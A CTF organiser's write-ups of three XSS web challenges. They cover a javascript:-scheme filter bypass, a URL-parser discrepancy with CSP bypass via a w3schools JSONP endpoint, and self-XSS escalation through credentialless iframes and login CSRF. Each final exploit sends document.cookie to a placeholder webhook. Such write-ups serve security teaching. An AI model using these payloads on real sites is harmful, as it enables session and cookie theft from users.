Last week, I had the opportunity to organize, together with the other K!nd4SUS members, the second edition of the K!nd4SUS CTF, where I contributed by creating three Web challenges: Spotivibe 1, Spotivibe 2, and Ez Bounty.

Below you can find the writeups for these challenges.

SpotiVibe 1


The application allows users to create custom song pages by embedding Spotify tracks.

There is also a feature that allows a user to report a song to an admin bot. The bot visits the reported page, and its cookie contains the flag, which immediately suggests that the challenge is XSS-related.

await page.setCookie({
    "name": "flag",
    "value": FLAG,
    "path": "/",
    "httpOnly": False
})
threading.Thread(target=run_bot, args=(song_id,)).start()

The vulnerable page is generated using user input when creating a song. The relevant part is the <iframe> that loads the provided Spotify URL:

<iframe 
    src="{{ song.spotify_url}}"
    width="400"
    height="380"
    frameborder="0"
    allowtransparency="true"
    allow="encrypted-media">
</iframe>

The application performs validation on the URL (here decoded is the percent-decoded form of the input), requiring:

if parsed.hostname != "open.spotify.com":
    return False

if not parsed.path.startswith("/embed/"):
    return False

if '"' in decoded:
    return False

At first glance, the validation seems reasonably secure, as it enforces both the hostname and the path of the provided URL. However, it completely lacks any control over the URL scheme (protocol), which makes it possible to bypass these checks.

In particular, this allows us to use the javascript: protocol instead of a standard https:// URL. When parsing a payload such as javascript://open.spotify.com/embed/..., Python’s urlparse interprets javascript as the scheme, open.spotify.com as the hostname, and /embed/... as the path.
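This behavior is easy to verify directly with urlparse (the payload below uses a harmless alert as a stand-in for the real exfiltration code):

```python
from urllib.parse import urlparse

# How Python parses a javascript: URL that mimics the Spotify embed path
parsed = urlparse("javascript://open.spotify.com/embed/%0aalert(1)")
print(parsed.scheme)    # javascript
print(parsed.hostname)  # open.spotify.com
print(parsed.path)      # /embed/%0aalert(1)
```

Since the hostname and path checks both pass, the URL is accepted even though its scheme is javascript.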

The final payload used to solve the challenge is:

javascript://open.spotify.com/embed/%0afetch('https://webhook/?c='+document.cookie)

Here, // starts a JavaScript comment, effectively ignoring open.spotify.com/embed/, while the newline (%0a) breaks the comment and allows the malicious code to execute.

SpotiVibe 2


In this second version of the challenge, an additional validation has been introduced to mitigate the previous vulnerability.

In particular, the application now enforces that the scheme must be either http or https:

if parsed.scheme not in ["http", "https"]:
    return False

This prevents the use of the javascript: protocol, making the previous exploit no longer viable.
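A quick check confirms the fix: with the scheme whitelist in place, the javascript: payload from the first challenge is now rejected (the helper name is mine, not the challenge's):

```python
from urllib.parse import urlparse

def scheme_allowed(url: str) -> bool:
    # The additional check introduced in SpotiVibe 2
    return urlparse(url).scheme in ["http", "https"]

print(scheme_allowed("javascript://open.spotify.com/embed/%0aalert(1)"))  # False
print(scheme_allowed("https://open.spotify.com/embed/track/x"))           # True
```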

As in the previous challenge, the flag is stored inside a cookie of the admin bot:

await page.setCookie({
    "name": "flag",
    "value": FLAG,
    "path": "/",
    "httpOnly": False
})

A new feature has also been introduced: a search functionality on the /dashboard page. The search parameter is directly rendered using the | safe filter:

<p>Results for: <strong>{{ search | safe }}</strong></p>

This introduces a clear XSS vulnerability on the search parameter.

However, this injection point alone is not sufficient due to the presence of a Content Security Policy (CSP), which blocks inline scripts and only allows scripts with a valid nonce or from specific trusted sources:

script-src 'self' 'nonce-...' https://www.w3schools.com;

To exploit the vulnerability, it is necessary to chain multiple issues together.

First, we bypass the URL validation by exploiting a discrepancy between how Python’s urlparse (which follows RFC 3986) and modern browsers (which follow the WHATWG URL Standard) interpret URLs.

According to RFC 3986, the \ character has no special meaning and is treated as a normal character. Therefore, when parsing a URL such as:

http://chall.k1nd4sus.it:30503\@open.spotify.com/embed/../../dashboard?search=

Python interprets it as:

- scheme: http
- userinfo: chall.k1nd4sus.it:30503\
- hostname: open.spotify.com
- path: /embed/../../dashboard

The @ symbol plays a crucial role here: in URLs, it separates the optional userinfo (username:password) from the hostname. Everything before @ is treated as user-controlled metadata, while everything after it is considered the actual host.

Because of this, the validation logic sees open.spotify.com as the hostname and accepts the URL.
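The discrepancy can be reproduced in a few lines: urlparse happily reports open.spotify.com as the hostname of the backslash URL:

```python
from urllib.parse import urlparse

# RFC 3986 parsing: the backslash is an ordinary character, so everything
# before the '@' is treated as userinfo and the real-looking host wins
url = "http://chall.k1nd4sus.it:30503\\@open.spotify.com/embed/../../dashboard?search="
parsed = urlparse(url)
print(parsed.hostname)  # open.spotify.com
print(parsed.path)      # /embed/../../dashboard
```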

However, browsers follow the WHATWG URL Standard, which normalizes backslashes (\) into forward slashes (/) before parsing. As a result, the same URL is interpreted by the browser as:

http://chall.k1nd4sus.it:30503/@open.spotify.com/embed/../../dashboard?search=

Now the hostname becomes chall.k1nd4sus.it, and @open.spotify.com is treated as part of the path rather than userinfo.

Finally, the ../../ sequence performs a path traversal, allowing navigation from /embed/ to /dashboard, where the XSS vulnerability is located.
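Browsers collapse dot segments when resolving the path; posixpath.normpath applies the same ../ rules and shows where the request actually lands (an analogy for the browser's normalization, not the browser itself):

```python
import posixpath

# After the browser turns '\' into '/', the path it resolves is:
path = "/@open.spotify.com/embed/../../dashboard"
print(posixpath.normpath(path))  # /dashboard
```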

At this point, we control the search parameter, but CSP still prevents direct execution of inline JavaScript.

However, the CSP explicitly allows scripts from https://www.w3schools.com. This can be abused using a JSONP endpoint.

JSONP (JSON with Padding) is a legacy technique where the server returns JavaScript instead of plain JSON, wrapping the response inside a user-controlled callback function. Since the callback is directly executed by the browser, controlling it allows arbitrary JavaScript execution.
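Conceptually, a JSONP endpoint builds its response by concatenating the caller-supplied callback with the data, which is why reflecting it unsanitized yields script execution. A toy model (not w3schools' actual code):

```python
def jsonp_response(callback: str, data: str) -> str:
    # Toy model of an unsanitized JSONP endpoint: the callback
    # parameter is reflected verbatim into a JavaScript response body
    return f"{callback}({data});"

# A benign caller gets its JSON wrapped in the expected function call...
print(jsonp_response("handleData", '{"ok": true}'))  # handleData({"ok": true});
# ...but an attacker-chosen "callback" becomes arbitrary JavaScript
print(jsonp_response("alert(document.cookie);void", '{"ok": true}'))
```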

The endpoint https://www.w3schools.com/js/demo_jsonp2.php reflects the callback parameter without sanitization, making it usable for a CSP bypass.

The final exploit is the following:

http://chall.k1nd4sus.it:30503\@open.spotify.com/embed/../../dashboard?search=<script+src='https://www.w3schools.com/js/demo_jsonp2.php?callback=setTimeout(function(){new Image().src='WEBHOOK_URL?d='+document.cookie},0)'></script>

Ez Bounty


The goal of this challenge is to steal the flag stored inside the admin bot’s cookie.

The application exposes a /report endpoint that allows us to make the admin bot visit an arbitrary URL.

await page.setCookie({
    "name": "flag",
    "value": FLAG,
    "httpOnly": False,
    "sameSite": "None",
    "secure": True
})

Additionally, the dashboard renders the username using the | safe filter:

<h1>Welcome <span class="username">{{ username | safe }}</span></h1>

This introduces a stored self-XSS: the payload only executes for whoever is logged into the account that owns the malicious username.

Intended Solution — Credentialless iframe abuse

At first glance, the self-XSS seems useless, since triggering it would require the bot to log into our account, losing access to the admin session and its cookie.

However, this limitation can be bypassed using credentialless iframes.

A credentialless iframe loads a page without sending cookies, creating a fresh session. At the same time, it still shares the same origin with other frames, allowing interaction via window.top.

To keep the injected username short, instead of placing all the JavaScript inside it, we use the following payload:

<img src=x onerror=eval(window.name)>

This allows us to store the actual JavaScript inside the iframe name attribute and execute it via eval(window.name).

When the XSS triggers, the injected script polls every 500 ms, walks through window.top.frames, locates the same-origin /dashboard frame, and exfiltrates its document.cookie to a webhook.

The final exploit page is:

<div style="display:flex; gap:20px;">

  <iframe
    name="
let i = setInterval(() => {
  try {
    for (let j = 0; j < window.top.frames.length; j++) {
      let f = window.top.frames[j];
      try {
        if (f.location.href.includes('dashboard')) {
          if (f.document && f.document.body && f.document.readyState === 'complete') {
            new Image().src =
              'https://WEBHOOK_URL?c=' +
              encodeURIComponent(f.document.cookie);
            clearInterval(i);
          }
        }
      } catch(e) {}
    }
  } catch(e) {}
}, 500);
"
    width="40%"
    height="500"
    credentialless>
  </iframe>

  <script>
document.querySelector("iframe").srcdoc = `
<form action="https://chall.k1nd4sus.it:30510/login" method="POST">
  <input name="username" value="<img src=x onerror=eval(window.name)>" />
  <input name="password" value="PASSWORD" />
</form>
<script>document.forms[0].submit();<\/script>
`;
</script>

  <iframe
    src="https://chall.k1nd4sus.it:30510/dashboard"
    width="40%"
    height="500">
  </iframe>

</div>

For a more in-depth explanation of this technique, see: https://blog.slonser.info/posts/make-self-xss-great-again/

Unintended Solution

An unintended solution consists of chaining the self-XSS with a lack of CSRF protection on the authentication endpoints.

The idea is to force the bot to log into our malicious account instead of the admin one.

This is possible because both /login and /logout do not implement CSRF protections.

We register a user with a malicious username such as:

<script>fetch('https://WEBHOOK_URL?c='+document.cookie)</script>

Then we host a page that logs the bot out and immediately logs it back in as our malicious user:

<form method="POST" action="https://chall.k1nd4sus.it:30510/login">
  <input name="username" value="&lt;script&gt;fetch('https://WEBHOOK_URL?c='+document.cookie)&lt;/script&gt;">
  <input name="password" value="password">
</form>

<script>
fetch("https://chall.k1nd4sus.it:30510/logout", {
  credentials: "include",
  mode: "no-cors"
}).then(() => document.forms[0].submit());
</script>

When the bot visits this page:

- the /logout request destroys the admin session;
- the auto-submitted form logs the bot into our account;
- the dashboard renders our malicious username, triggering the XSS, which exfiltrates document.cookie.

This works because session.clear() only removes the server-side session data and the associated session cookie, but it does not affect other cookies set in the browser.

In particular, the flag is stored in a separate cookie that is manually set by the bot using page.setCookie(). This cookie is not tied to the Flask session and is therefore not removed during the logout process.

As a result, even after the forced logout and subsequent login into our account, the flag cookie is still present in the browser.
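The situation can be modeled with a toy cookie jar (cookie names taken from the bot code; the helper name is mine):

```python
# Toy model of the bot's browser cookie jar during the unintended solve
cookies = {"session": "<admin Flask session>", "flag": "KSUS{...}"}

def forced_logout(jar: dict) -> None:
    # session.clear() plus the expired Set-Cookie only remove the Flask
    # session cookie; unrelated cookies survive in the browser
    jar.pop("session", None)

forced_logout(cookies)
print(cookies)  # {'flag': 'KSUS{...}'}
```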